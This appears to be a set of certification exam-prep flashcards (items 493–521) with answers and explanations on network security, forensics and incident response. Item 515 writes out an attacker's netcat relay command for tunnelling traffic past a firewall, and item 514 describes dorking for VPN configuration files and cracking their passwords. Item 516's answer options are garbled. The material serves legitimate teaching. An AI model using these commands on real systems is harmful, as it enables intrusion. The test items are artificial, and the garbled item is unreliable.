OBJ-3.4: Since the instructors need to keep the wireless network open, the BEST option is to implement MAC filtering to prevent the students from connecting to the network while still keeping the network open. Since the instructors would most likely use the same devices to connect to the network, it would be relatively easy to implement a MAC filtering-based whitelist of devices that are allowed to use the open network and reject any other devices not listed by the instructors (like the students’ laptops or phones). Reducing the signal strength would not solve this issue since students and instructors are in the same classrooms. Using Network Address Translation and Quality of Service will not prevent the students from accessing or using the open network.

493
Q

A software assurance laboratory performs a dynamic assessment on an application by automatically generating random data sets and inputting them in an attempt to cause an error or failure condition. Which of the following is the laboratory performing?

Fuzzing
Stress testing
User acceptance testing
Security regression testing

A

Fuzzing
OBJ-3.2: Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, failing built-in code assertions, or potential memory leaks. User Acceptance Testing is the process of verifying that a created solution/software works for the user. Security regression testing ensures that changes made to a system do not harm its security; such approaches are therefore of high significance, and interest in them has steadily increased. Stress testing verifies the system’s stability and reliability by measuring its robustness and error handling capabilities under heavy load conditions.

494
Q

A financial services company wants to donate some old hard drives from their servers to a local charity. Still, they are concerned about the possibility of residual data being left on the drives. Which of the following secure disposal methods would you recommend the company use?

Secure erase
Cryptographic erase
Zero-fill
Overwrite

A

Cryptographic erase
OBJ-3.2: In a cryptographic erase (CE), the storage media is encrypted by default. The encryption key itself is destroyed during the erasing operation. CE is a feature of self-encrypting drives (SED) and is often used with solid-state devices. Cryptographic erase can be used with hard drives, as well. Zero-fill is a process that fills the entire storage device with zeroes. For SSDs and hybrid drives, zero-fill-based methods might not be reliable because the device uses wear-leveling routines in the drive controller to communicate which locations are available for use to any software process accessing the device. A secure erase is a special utility provided with some solid-state drives that can perform the sanitization of flash-based devices. Overwrite is like zero-fill but can utilize a random pattern of ones and zeroes on the storage device. The most secure option would be a cryptographic erase (CE) for the question’s scenario.

495
Q
You are working as a network administrator for Dion Training. The company has decided to allow employees to connect their devices to the corporate wireless network under a new BYOD policy. You have been asked to separate the corporate network into an administrative network (for corporate-owned devices) and an untrusted network (for employee-owned devices). Which of the following technologies should you implement to achieve this goal?
VPN
VLAN
WPA2
MAC filtering
A

VLAN
OBJ-3.3: A virtual local area network (VLAN) is a type of network segmentation configured in your network switches that prevents communications between different VLANs without using a router. This allows two virtually separated networks to exist on one physical network and separates the two virtual networks’ data. A virtual private network (VPN) is a remote access capability to connect a trusted device over an untrusted network back to the corporate network. A VPN would not create the desired effect. WPA2 is a type of wireless encryption, but it will not create two different segmented networks on the same physical hardware. MAC filtering is used to allow or deny a device from connecting to a network, but it will not create two network segments, as desired.

496
Q
Users connecting to an SSID appear to be unable to authenticate to the captive portal. Which of the following is the MOST likely cause of the issue?
WPA2 security key
SSL certificates
CSMA/CA
RADIUS
A

RADIUS

OBJ-3.8: Captive portals usually rely on 802.1x, and 802.1x uses RADIUS for authentication.

497
Q
You want to provide controlled remote access to the remote administration interfaces of multiple servers hosted on a private cloud. What type of segmentation security solution is the best choice for this scenario?
Airgap
Jumpbox
Bastion hosts
Physical
A

Jumpbox
OBJ-3.3: Installing a jumpbox as a single point of entry for the administration of servers within the cloud is the best choice for this requirement. The jumpbox only runs the necessary administrative port and protocol (typically SSH). Administrators connect to the jumpbox, then use the jumpbox to connect to the admin interface on the application server. The application server’s admin interface has a single entry in its ACL (the jumpbox) and denies any other hosts’ connection attempts. A bastion host is a special-purpose computer on a network specifically designed and configured to withstand attacks. The computer generally hosts a single application (for example, a proxy server), and all other services are removed or limited to reduce the threat to the computer. An airgap system is a network or single host computer with unique security requirements that may physically be separated from any other network. Physical separation would prevent a system from accessing the remote administration interface directly and require an airgap system to reach the private cloud.

498
Q

Which of the following secure coding best practices ensures special characters like , /, and ‘ are not accepted from the user via a web form?

Session management
Output encoding
Error handling
Input validation

A

Input validation
OBJ-3.2: Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering a malfunction of various downstream components. Input validation should happen as early as possible in the data flow, preferably as soon as the data is received from the user. Improper error handling can introduce various security problems where detailed internal error messages such as stack traces, database dumps, and error codes are displayed to an attacker. The session management implementation defines the exchange mechanism that will be used between the user and the web application to share and continuously exchange the session ID. Output encoding involves translating special characters into some different but equivalent form that is no longer dangerous in the target interpreter, for example, translating the < character into the &lt; string when writing to an HTML page.

499
Q

You have been asked to install a computer in a public workspace. Only an authorized user should use the computer. Which of the following security requirements should you implement to prevent unauthorized users from accessing the network with this computer?

Issue the same strong and complex password for all users
Require authentication on wake-up
Disable single sign-on
Remove the guest account from the administrator group

A

Require authentication on wake-up
OBJ-3.8: To prevent the computer from being used inadvertently to access the network, the system should be configured to require authentication whenever the computer is woken up. Therefore, if an authorized user walks away from the computer and it goes to sleep, then when another person tries to use the computer, it will ask for a username and password before granting them access to the network.

500
Q
David noticed that port 3389 was open on one of the POS terminals in a store during a scheduled PCI compliance scan. Based on the scan results, what service should he expect to find enabled on this terminal?
MySQL
RDP
LDAP
IMAP
A

RDP
OBJ-3.1: Port 3389 is an RDP port used for the Remote Desktop Protocol. If this port isn’t supposed to be open, then an incident response plan should be the next step since this can be used for remote access by an attacker. MySQL runs on port 3306. LDAP runs on port 389. IMAP over SSL runs on port 993.

501
Q

Your email client has been acting strangely recently. Every time you open an email with an image embedded within it, the image is not displayed on your screen. Which of the following is the MOST likely cause of this issue?
Incorrect security settings in the email client
Incorrect email settings in the anti-virus software
Incorrect settings in the host-based firewall
Incorrect settings in your email proxy server
Incorrect settings in your web browser’s trusted site configuration

A

Incorrect security settings in the email client

OBJ-3.1: This is a security setting in the mail client to prevent malware and viruses from entering your environment. If the images are not downloaded on a received email, they will display as a red X within the reply email. If the email was forwarded, then the images will be displayed as a white box with a black border. This can be seen in the source code as ‘Image Removed by Sender’ next to where the images should be. For example, in the Microsoft Outlook email client, the security settings for hosted images can be changed within the mail client’s Trust Center (Outlook Options -> Trust Center -> Trust Center Settings).

502
Q
Which of the following access control methods provides the most detailed and explicit type of access control over a resource?
MAC
RBAC
DAC
ABAC
A

ABAC
OBJ-3.8: Attribute-based access control (ABAC) provides the most detailed and explicit type of access control over a resource because it is capable of making access decisions based on a combination of subject and object attributes, as well as context-sensitive or system-wide attributes. Information such as the group membership, the OS being used by the user, and even the machine’s IP address could be considered when granting or denying access.

503
Q
Which of the following types of digital forensic investigations is most challenging due to the on-demand nature of the analyzed assets?
Employee workstations
Cloud services
Mobile devices
On-premise servers
A

Cloud services
OBJ-3.6: The on-demand nature of cloud services means that instances are often created and destroyed again, with no real opportunity for forensic recovery of any data. Cloud providers can mitigate this to some extent by using extensive logging and monitoring options. A CSP might also provide an option to generate a file system and memory snapshots from containers and VMs in response to an alert condition generated by a SIEM. Employee workstations are often the easiest to conduct forensics on since they are a single-user environment for the most part. Mobile devices have some unique challenges due to their operating systems, but good forensic tool suites are available to ease the forensic acquisition and analysis of mobile devices. On-premise servers are more challenging than a workstation to analyze, but they do not suffer from the same issues as cloud-based services and servers.

504
Q
You received an incident response report indicating a piece of malware was introduced into the company’s network through a remote workstation connected to the company’s servers over a VPN connection. Which of the following controls should be applied to prevent this type of incident from occurring again?
ACL
NAC
SPF
MAC filtering
A

NAC
OBJ-3.3: Network Access Control (NAC) is an approach to computer security that attempts to unify endpoint security technology (such as anti-virus, host intrusion prevention, and vulnerability assessment), user or system authentication, and network security enforcement. When a remote workstation connects to the network, NAC will place it into a segmented portion of the network (sandbox), scan it for malware and validate its security controls, and then, based on the results of those scans, either connect it to the company’s networks or place the workstation into a separate quarantined portion of the network for further remediation. An access control list (ACL) is a network traffic filter that can control incoming or outgoing traffic. An ACL alone would not have prevented this issue. MAC Filtering refers to a security access control method whereby the MAC address assigned to each network card is used to determine access to the network. MAC filtering operates at layer 2 and is easy to bypass. Sender Policy Framework (SPF) is an email authentication method designed to detect forged sender addresses during email delivery.

505
Q
You are the first forensic analyst to arrive on the scene of a data breach. You have been asked to begin evidence collection on the server while waiting for the rest of your team to arrive. Which of the following evidence should you capture first?
Image of the server's SSD
L3 cache
Backup tapes
ARP cache
A

L3 cache
OBJ-4.5: When collecting evidence, you should always follow the order of volatility. This will allow you to collect the most volatile evidence (most likely to change) first and the least volatile (least likely to change) last. You should always begin collecting the CPU registers and cache memory (L1/L2/L3/GPU). Next come the contents of system memory (RAM), including the routing table, ARP cache, process tables, kernel statistics, and temporary file systems/swap space/virtual memory. Next, you would move on to the collection of data storage devices like hard drives, SSDs, and flash memory devices. After that, you would move on to less volatile data such as backup tapes, external media devices (hard drives, DVDs, etc.), and even configuration data or network diagrams.

506
Q

You are in the recovery steps of an incident response. Your analysis revealed that the attacker exploited an unpatched vulnerability on a public-facing web server as the initial intrusion vector in this incident. Which of the following mitigations should be implemented first during the recovery?
Disable unused user account and reset the administrator credentials
Restrict shell commands per user or per host for least privilege purposes
Scan the network for additional instances of this vulnerability and patch the affected assets
Restrict host access to peripheral protocols like USB and Bluetooth

A

Scan the network for additional instances of this vulnerability and patch the affected assets

OBJ-4.2: All of the options listed are the best security practices to implement before and after a detected intrusion, but scanning for additional instances of this vulnerability should be performed first. Often, an enterprise network uses the same baseline configuration for all servers and workstations. Therefore, if a vulnerability is exploited on one device (such as an insecure configuration), that same vulnerability could exist on many other assets across the network. During your recovery, you must identify if any other network systems share the same vulnerability and mitigate them. If you don’t, the attacker could quickly reinfect your network by simply attacking another machine using the same techniques used during this intrusion. The other options listed are all examples of additional device hardening that should be conducted during recovery after you have identified the exploited vulnerability across the rest of the network.

507
Q

A firewall administrator has configured a new DMZ to allow public systems to be segmented from the organization’s internal network. The firewall now has three security zones set: Untrusted (Internet) [143.27.43.0/24]; DMZ (DMZ) [161.212.71.0/24]; Trusted (Intranet) [10.10.0.0/24]. The firewall administrator has been asked to enable remote desktop access from a fixed IP on the remote network to a remote desktop server in the DMZ for the Chief Security Officer to work from his home office after hours. The CSO’s home internet uses a static IP of 143.27.43.32. The remote desktop server is assigned a public-facing IP of 161.212.71.14. What rule should the administrator add to the firewall?
Permit 143.27.43.0/24 161.212.71.0/24 RDP 3389
Permit 143.27.43.32 161.212.71.14 RDP 3389
Permit 143.27.43.32 161.212.71.0/24 RDP 3389
Permit 143.27.43.0/24 161.212.71.14 RDP 3389

A

Permit 143.27.43.32 161.212.71.14 RDP 3389
OBJ-4.4: Due to the requirement to allow a single remote IP to enter the firewall, the permit statement must start with a single IP in the Untrusted (Internet) zone. Based on the options provided, only 143.27.43.32 could be correct. Next, the destination is a single server in the DMZ, so only 161.212.71.14 could be correct. The destination port should be 3389, which is the port for the Remote Desktop Protocol. Combining these three facts, only “permit 143.27.43.32 161.212.71.14 RDP 3389” could be correct.

508
Q
You are conducting an intensive vulnerability scan to detect which ports might be open to exploitation. During the scan, one of the network services becomes disabled and impacts the production server. Which of the following sources of information would provide you with the most relevant information for you to use in determining which network service was interrupted and why?
Syslog
Network mapping
Firewall logs
NIDS
A

Syslog
OBJ-4.3: The Syslog server is a centralized log management solution. By looking through the logs on the Syslog server, the technician could determine which service failed on which server since all the logs are retained on the Syslog server from all of the network devices and servers. Network mapping is conducted using active and passive scanning techniques and could help determine which server was offline, but not what caused the interruption. Firewall logs would only help determine why the network connectivity between a host and destination may have been disrupted. A network intrusion detection system (NIDS) is used to detect hacking activities, denial of service attacks, and port scans on a computer network. It is unlikely to provide the details needed to identify why the network service was interrupted.

509
Q
Which of the following command-line tools would you use to identify open ports and services on a host along with the version of the application that is associated with them?
ping
nmap
netstat
Wireshark
A

nmap
OBJ-4.1: Nmap sends specially crafted packets to the target host(s) and then analyzes the responses to determine the open ports and services running on those hosts. Also, nmap can determine the versions of the applications being used on those ports and services. Nmap is a command-line tool for use on Linux, Windows, and macOS systems. The netstat (network statistics) tool is a command-line utility that displays network connections for incoming and outgoing TCP packets, routing tables, and some network interface and network protocol statistics. Still, it cannot identify open ports and services on a host with their version numbers. The ping tool is used to query another computer on a network to determine whether there is a valid connection. Wireshark is an open-source packet analyzer used for network troubleshooting, analysis, software and communications protocol development, and education.

510
Q

You are working as part of a cyber incident response team. An ongoing attack has been identified on your webserver. Your company wants to take legal action against the criminals who have hacked your server, so they have brought a forensic analyst from the FBI to collect the evidence from the server. In what order should the digital evidence be collected based on the order of volatility?
Hard Drive or USB Drive, Swap File, Random Access Memory, Processor Cache

Processor Cache, Swap File, Random Access Memory, Hard Drive or USB Drive

Processor Cache, Random Access Memory, Swap File, Hard Drive or USB Drive

Swap File, Processor Cache, Random Access Memory, Hard Drive or USB Drive

A

Processor Cache, Random Access Memory, Swap File, Hard Drive or USB Drive

OBJ-4.5: The correct order for evidence collection based on the order of volatility is the Processor Cache, Random Access Memory, Swap File, and then the Hard Drive or USB Drive. Since the Processor Cache is the most volatile and changes the most frequently, it should be captured first. Random Access Memory (RAM) is temporary storage on a computer. It can quickly change or be overwritten, and the information stored in RAM is lost when power is removed from the computer, so it should be collected second. Swap files are temporary files on a hard disk used as virtual memory, and therefore, they should be collected third. The files on a hard disk or USB drive are the least volatile of the four options presented since they are used for long-term storage of data and are not lost when the computer loses power.

511
Q
Your coworker is creating a script to run on a Windows server using PowerShell. Which of the following file formats should the file be in?
.bat
.sh
.py
.ps1
A

.ps1
OBJ-4.1: If you want to save a series of PowerShell commands in a file to rerun them later, you effectively create a PowerShell script. This is simply a text file with a .ps1 extension. The file contains a series of PowerShell commands, with each command appearing on a separate line.

512
Q

Consider the following snippet from a log file collected on the host with the IP address of 10.10.3.6.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Time: Jun 12, 2020 09:24:12 Port:20 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:14 Port:21 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:16 Port:22 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:18 Port:23 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:20 Port:25 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:22 Port:80 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:24 Port:135 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:26 Port:443 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
Time: Jun 12, 2020 09:24:26 Port:445 Source: 10.10.3.2 Destination:10.10.3.6 Protocol:TCP
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What type of activity occurred based on the output above?
Port scan targeting 10.10.3.2
Fragmentation attack targeting 10.10.3.6
Denial of service attack targeting 10.10.3.6
Port scan targeting 10.10.3.6

A

Port scan targeting 10.10.3.6
OBJ-4.1: Port Scanning is the name for the technique used to identify open ports and services available on a network host. Based on the logs, you can see a sequential scan of some commonly used ports (20, 21, 22, 23, 25, 80, 135, 443, 445) with a two-second pause between each attempt. The scan source is 10.10.3.2, and the destination of the scan is 10.10.3.6, making “Port scan targeting 10.10.3.6” the correct choice. IP fragmentation attacks are a common form of denial of service attack, in which the perpetrator overbears a network by exploiting datagram fragmentation mechanisms. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor’s actions.

513
Q
What containment technique is the strongest possible response to an incident?
Segmentation
Isolating affected systems
Isolating the attacker
Enumeration
A

Isolating affected systems
OBJ-4.4: Isolation involves removing an affected component from whatever larger environment it is a part of. This can be everything from removing a server from the network after it has been the target of a DoS attack to placing an application in a sandbox virtual machine (VM) outside of the host environments it usually runs on. Segmentation-based containment is a means of achieving the isolation of a host or group of hosts using network technologies and architecture. Segmentation uses VLANs, routing/subnets, and firewall ACLs to prevent a host or group of hosts from communicating outside the protected segment. Removal is not an industry term used but would be a synonym for isolation. Enumeration is defined as the process of extracting user names, machine names, network resources, shares, and services from a system. Isolating the attacker would only stop their direct two-way communication and control of the affected system. However, it would not be the strongest possible response since there could be malicious code still running on your victimized machine.

514
Q
An attacker is searching in Google for Cisco VPN configuration files by using the filetype:pcf modifier. The attacker could locate several of these configuration files and now wants to decode any connectivity passwords that they might contain. What tool should the attacker use?
Nmap
Nessus
Cain and Abel
Netcat
A

Cain and Abel
OBJ-4.1: Cain and Abel is a popular password cracking tool. It can recover many password types using methods such as network packet sniffing, cracking various password hashes by using methods such as dictionary attacks, brute force, and cryptanalysis attacks. It also includes a module to conduct Cisco VPN Client Password Decoding too. CUPP is used to create password lists. Nessus is a vulnerability scanner. The netcat tool is used to create reverse shells for remote access.

515
Q

An attacker has issued the following command: nc -l -p 8080 | nc 192.168.1.76 443. Based on this command, what will occur?
Netcat will listen on the 192.168.1.76 interface for 443 seconds on port 8080
Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443
Netcat will listen for a connection from 192.168.1.76 on port 443 and output anything received to port 8080
Netcat will listen on port 8080 and then output anything received to local interface 192.168.1.76

A

Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443

OBJ-4.1: The proper syntax for netcat (nc) is -l to signify listening and -p to specify the listening port. Then, the | character allows multiple commands to execute during a single command execution. Next, netcat sends the data to the given IP (192.168.1.76) over port 443. This is a common technique to bypass the firewall by sending traffic over port 443 (a secure SSL/TLS tunnel).

516
Q

While performing a vulnerability scan, Christina discovered an administrative interface to a storage system is exposed to the internet. She looks through the firewall logs and attempts to determine whether any access attempts have occurred from external sources. Which of the following IP addresses in the firewall logs would indicate a connection attempt from an external source?

  1. 15.1.100
  2. 186.1.100
  3. 16.1.100
  4. 168.1.100
A

192.186.1.100
OBJ-4.3: This question tests your ability to determine if an IP address is a publicly routable IP (external connection) or private IP (internal connection). Private IP addresses are either 10.x.x.x, 172.16-31.x.x, or 192.168.x.x. All other IP addresses are considered publicly routable over the internet (except localhost and APIPA addresses). Therefore, the answer must be 192.186.1.100 since it is not a private IP address.

517
Q

During an assessment of the POS terminals that accept credit cards, a cybersecurity analyst notices a recent Windows operating system vulnerability exists on every terminal. Since these systems are all embedded and require a manufacturer update, the analyst cannot install Microsoft’s regular patch. Which of the following options would be best to ensure the systems remain protected and are compliant with the rules outlined by the PCI DSS?
Replace the Windows POS terminals with standard Windows systems
Build a custom OS image that includes the patch
Identify, implement, and document compensating controls
Remove the POS terminals from the network until the vendor releases a patch

A

Identify, implement, and document compensating controls
OBJ-5.1: Since the analyst cannot remediate the vulnerabilities by installing a patch, the next best action would be to implement some compensating controls. If a vulnerability exists that cannot be patched, compensating controls can mitigate the risk. Additionally, the analyst should document the current situation to achieve compliance with PCI DSS. The analyst will likely not remove the terminals from the network without affecting business operations, so this is a bad option. The analyst should not build a custom OS image with the patch since this could void the support agreement with the manufacturer and introduce additional vulnerabilities. Also, it would be difficult (or impossible) to replace the POS terminals with standard Windows systems due to the custom firmware and software utilized on these systems.

518
Q

A cybersecurity analyst is analyzing what they believe to be an active intrusion into their network. The indicator of compromise maps to a suspected nation-state group that has strong financial motives, APT 38. Unfortunately, the analyst finds their data correlation lacking and cannot determine which assets have been affected, so they begin to review the list of network assets online. The following servers are currently online: PAYROLL_DB, DEV_SERVER7, FIREFLY, DEATHSTAR, THOR, and DION. Which of the following actions should the analyst conduct first?
Hardening the DEV_SERVER7 server
Conduct a Nessus scan of the FIREFLY server
Conduct a data criticality and prioritization analysis
Logically isolate the PAYROLL_DB server from the production network

A

Conduct a data criticality and prioritization analysis

OBJ-5.4: While the payroll server could be assumed to hold PII, financial information, and corporate information, the analyst would only be making that assumption based on its name. Even before an incident response occurs, it would be a good idea to conduct a data criticality and prioritization analysis to determine what assets are critical to your business operations and need to be prioritized for protection. After an intrusion occurs, this information could be used to better protect and defend those assets against an attacker. Since the question states the analyst is trying to determine which server to look at based on their names, it is clear this organization never performed a data criticality and prioritization analysis and should do that first. After all, with names like FIREFLY, DEATHSTAR, THOR, and DION, the analyst has no idea what is stored on those systems. For example, how do we know that DEATHSTAR doesn’t contain their credit card processing systems, which would be a more lucrative target for APT 38 than the PAYROLL_DB? The suggestions of hardening, logically isolating, or conducting a vulnerability scan of a particular server are random guesses by the analyst since they don’t know which data they should focus on protecting or where the attacker is currently.

519
Q
What is a legal contract outlining the confidential material or information that will be shared by the pentester and the organization during an assessment?
SOW
MSA
NDA
Corporate Policy

A

NDA

OBJ-5.3: This is the definition of a non-disclosure agreement (NDA). There may be two NDAs in use: one from the organization to the pentester and another from the pentester to the organization. The Scope of Work is a formal document stating what will and will not be performed during a penetration test. It should also contain the assessment’s size and scope and a list of the assessment’s objectives. A master service agreement, or MSA, is a contract reached between parties in which the parties agree to most of the terms that will govern future transactions or future agreements. The MSA is used when a pentester will be on retainer for a multi-year contract, and an individual SOW will be issued for each assessment to define the individual scope of each one. Corporate policy is a documented set of broad guidelines, formulated after analyzing all internal and external factors that can affect an organization’s objectives, operations, and plans.

520
Q

You walked up behind a penetration tester in your organization and saw the following output on their Kali Linux terminal:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[ATTEMPT] target 192.168.1.142 - login "root" - pass "abcde" 1 of 10
[ATTEMPT] target 192.168.1.142 - login "root" - pass "efghi" 2 of 10
[ATTEMPT] target 192.168.1.142 - login "root" - pass "12345" 3 of 10
[ATTEMPT] target 192.168.1.142 - login "root" - pass "67890" 4 of 10
[ATTEMPT] target 192.168.1.142 - login "root" - pass "a1b2c" 5 of 10
[ATTEMPT] target 192.168.1.142 - login "user" - pass "abcde" 6 of 10
[ATTEMPT] target 192.168.1.142 - login "user" - pass "efghi" 7 of 10
[ATTEMPT] target 192.168.1.142 - login "user" - pass "12345" 8 of 10
[ATTEMPT] target 192.168.1.142 - login "user" - pass "67890" 9 of 10
[ATTEMPT] target 192.168.1.142 - login "user" - pass "a1b2c" 10 of 10
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What type of test is the penetration tester currently conducting?
Conducting a port scan of 192.168.1.142
Conducting a brute force login attempt of a remote service on 192.168.1.142
Conducting a ping sweep of 192.168.1.142/24
Conducting a Denial of Service attack on 192.168.1.142

A

Conducting a brute force login attempt of a remote service on 192.168.1.142

OBJ-1.2: The penetration tester is attempting to conduct a brute force login attempt of a remote service on 192.168.1.142, as shown by the multiple login attempts with common usernames and passwords. A brute force attack attempts to crack a password or username, find a hidden web page, or find the key used to encrypt a message using a trial-and-error approach, hoping eventually to guess correctly. Port scanning is the name for the technique used to identify open ports and services available on a network host. A denial-of-service (DoS) attack occurs when legitimate users cannot access information systems, devices, or other network resources due to a malicious cyber threat actor’s actions. A ping sweep is a basic network scanning technique used to determine which IP addresses in a range map to live hosts.

521
Q
Which of the following cryptographic algorithms is classified as symmetric?
GPG
ECC
DES
DSA
A

DES

OBJ-2.8: The Data Encryption Standard (DES) is a symmetric-key algorithm for encrypting digital data. Although its short key length of 56 bits makes it too insecure for applications today, it was the standard used from 1977 until the early 2000s. GPG, ECC, and DSA are all asymmetric algorithms.